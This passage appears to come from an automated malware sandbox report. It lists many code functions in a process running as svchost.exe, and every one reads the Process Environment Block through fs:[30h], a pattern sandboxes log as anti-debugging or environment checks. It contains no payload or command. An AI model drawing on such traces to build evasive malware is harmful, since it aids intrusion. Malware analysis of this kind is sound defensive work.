                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]1_2_03B34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]1_2_03B34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]1_2_03B34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2826B mov eax, dword ptr fs:[00000030h]1_2_03B2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A250 mov eax, dword ptr fs:[00000030h]1_2_03B2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36259 mov eax, dword ptr fs:[00000030h]1_2_03B36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEA250 mov eax, dword ptr fs:[00000030h]1_2_03BEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEA250 mov eax, dword ptr fs:[00000030h]1_2_03BEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB8243 mov eax, dword ptr fs:[00000030h]1_2_03BB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB8243 mov ecx, dword ptr fs:[00000030h]1_2_03BB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]1_2_03B2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]1_2_03B2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]1_2_03B2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C061E5 mov eax, dword ptr fs:[00000030h]1_2_03C061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B70185 mov eax, dword ptr fs:[00000030h]1_2_03B70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h]1_2_03BEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h]1_2_03BEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD4180 mov eax, dword ptr fs:[00000030h]1_2_03BD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD4180 mov eax, dword ptr fs:[00000030h]1_2_03BD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B601F8 mov eax, dword ptr fs:[00000030h]1_2_03B601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF61C3 mov eax, dword ptr fs:[00000030h]1_2_03BF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF61C3 mov eax, dword ptr fs:[00000030h]1_2_03BF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B60124 mov eax, dword ptr fs:[00000030h]1_2_03B60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04164 mov eax, dword ptr fs:[00000030h]1_2_03C04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04164 mov eax, dword ptr fs:[00000030h]1_2_03C04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA118 mov ecx, dword ptr fs:[00000030h]1_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]1_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]1_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]1_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF0115 mov eax, dword ptr fs:[00000030h]1_2_03BF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C156 mov eax, dword ptr fs:[00000030h]1_2_03B2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC8158 mov eax, dword ptr fs:[00000030h]1_2_03BC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36154 mov eax, dword ptr fs:[00000030h]1_2_03B36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36154 mov eax, dword ptr fs:[00000030h]1_2_03B36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov ecx, dword ptr fs:[00000030h]1_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF60B8 mov eax, dword ptr fs:[00000030h]1_2_03BF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03BF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B280A0 mov eax, dword ptr fs:[00000030h]1_2_03B280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC80A8 mov eax, dword ptr fs:[00000030h]1_2_03BC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3208A mov eax, dword ptr fs:[00000030h]1_2_03B3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03B2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B720F0 mov ecx, dword ptr fs:[00000030h]1_2_03B720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03B2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B380E9 mov eax, dword ptr fs:[00000030h]1_2_03B380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB60E0 mov eax, dword ptr fs:[00000030h]1_2_03BB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB20DE mov eax, dword ptr fs:[00000030h]1_2_03BB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC6030 mov eax, dword ptr fs:[00000030h]1_2_03BC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A020 mov eax, dword ptr fs:[00000030h]1_2_03B2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C020 mov eax, dword ptr fs:[00000030h]1_2_03B2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]1_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]1_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]1_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]1_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB4000 mov ecx, dword ptr fs:[00000030h]1_2_03BB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5C073 mov eax, dword ptr fs:[00000030h]1_2_03B5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B32050 mov eax, dword ptr fs:[00000030h]1_2_03B32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6050 mov eax, dword ptr fs:[00000030h]1_2_03BB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B307AF mov eax, dword ptr fs:[00000030h]1_2_03B307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE47A0 mov eax, dword ptr fs:[00000030h]1_2_03BE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD678E mov eax, dword ptr fs:[00000030h]1_2_03BD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B347FB mov eax, dword ptr fs:[00000030h]1_2_03B347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B347FB mov eax, dword ptr fs:[00000030h]1_2_03B347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]1_2_03B527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]1_2_03B527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]1_2_03B527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]1_2_03BBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]1_2_03B3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB07C3 mov eax, dword ptr fs:[00000030h]1_2_03BB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6273C mov eax, dword ptr fs:[00000030h]1_2_03B6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6273C mov ecx, dword ptr fs:[00000030h]1_2_03B6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6273C mov eax, dword ptr fs:[00000030h]1_2_03B6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAC730 mov eax, dword ptr fs:[00000030h]1_2_03BAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C720 mov eax, dword ptr fs:[00000030h]1_2_03B6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C720 mov eax, dword ptr fs:[00000030h]1_2_03B6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30710 mov eax, dword ptr fs:[00000030h]1_2_03B30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B60710 mov eax, dword ptr fs:[00000030h]1_2_03B60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C700 mov eax, dword ptr fs:[00000030h]1_2_03B6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38770 mov eax, dword ptr fs:[00000030h]1_2_03B38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30750 mov eax, dword ptr fs:[00000030h]1_2_03B30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBE75D mov eax, dword ptr fs:[00000030h]1_2_03BBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72750 mov eax, dword ptr fs:[00000030h]1_2_03B72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72750 mov eax, dword ptr fs:[00000030h]1_2_03B72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB4755 mov eax, dword ptr fs:[00000030h]1_2_03BB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6674D mov esi, dword ptr fs:[00000030h]1_2_03B6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6674D mov eax, dword ptr fs:[00000030h]1_2_03B6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6674D mov eax, dword ptr fs:[00000030h]1_2_03B6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B666B0 mov eax, dword ptr fs:[00000030h]1_2_03B666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]1_2_03B6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34690 mov eax, dword ptr fs:[00000030h]1_2_03B34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34690 mov eax, dword ptr fs:[00000030h]1_2_03B34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB06F1 mov eax, dword ptr fs:[00000030h]1_2_03BB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB06F1 mov eax, dword ptr fs:[00000030h]1_2_03BB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03B6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03B6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E627 mov eax, dword ptr fs:[00000030h]1_2_03B4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B66620 mov eax, dword ptr fs:[00000030h]1_2_03B66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68620 mov eax, dword ptr fs:[00000030h]1_2_03B68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3262C mov eax, dword ptr fs:[00000030h]1_2_03B3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72619 mov eax, dword ptr fs:[00000030h]1_2_03B72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE609 mov eax, dword ptr fs:[00000030h]1_2_03BAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B62674 mov eax, dword ptr fs:[00000030h]1_2_03B62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF866E mov eax, dword ptr fs:[00000030h]1_2_03BF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF866E mov eax, dword ptr fs:[00000030h]1_2_03BF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A660 mov eax, dword ptr fs:[00000030h]1_2_03B6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A660 mov eax, dword ptr fs:[00000030h]1_2_03B6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4C640 mov eax, dword ptr fs:[00000030h]1_2_03B4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B545B1 mov eax, dword ptr fs:[00000030h]1_2_03B545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B545B1 mov eax, dword ptr fs:[00000030h]1_2_03B545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB05A7 mov eax, dword ptr fs:[00000030h]1_2_03BB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB05A7 mov eax, dword ptr fs:[00000030h]1_2_03BB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB05A7 mov eax, dword ptr fs:[00000030h]1_2_03BB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E59C mov eax, dword ptr fs:[00000030h]1_2_03B6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B32582 mov eax, dword ptr fs:[00000030h]1_2_03B32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B32582 mov ecx, dword ptr fs:[00000030h]1_2_03B32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B64588 mov eax, dword ptr fs:[00000030h]1_2_03B64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B325E0 mov eax, dword ptr fs:[00000030h]1_2_03B325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C5ED mov eax, dword ptr fs:[00000030h]1_2_03B6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C5ED mov eax, dword ptr fs:[00000030h]1_2_03B6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B365D0 mov eax, dword ptr fs:[00000030h]1_2_03B365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03B6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03B6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E5CF mov eax, dword ptr fs:[00000030h]1_2_03B6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E5CF mov eax, dword ptr fs:[00000030h]1_2_03B6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC6500 mov eax, dword ptr fs:[00000030h]1_2_03BC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6656A mov eax, dword ptr fs:[00000030h]1_2_03B6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6656A mov eax, dword ptr fs:[00000030h]1_2_03B6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6656A mov eax, dword ptr fs:[00000030h]1_2_03B6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38550 mov eax, dword ptr fs:[00000030h]1_2_03B38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38550 mov eax, dword ptr fs:[00000030h]1_2_03B38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B644B0 mov ecx, dword ptr fs:[00000030h]1_2_03B644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]1_2_03BBA4B0
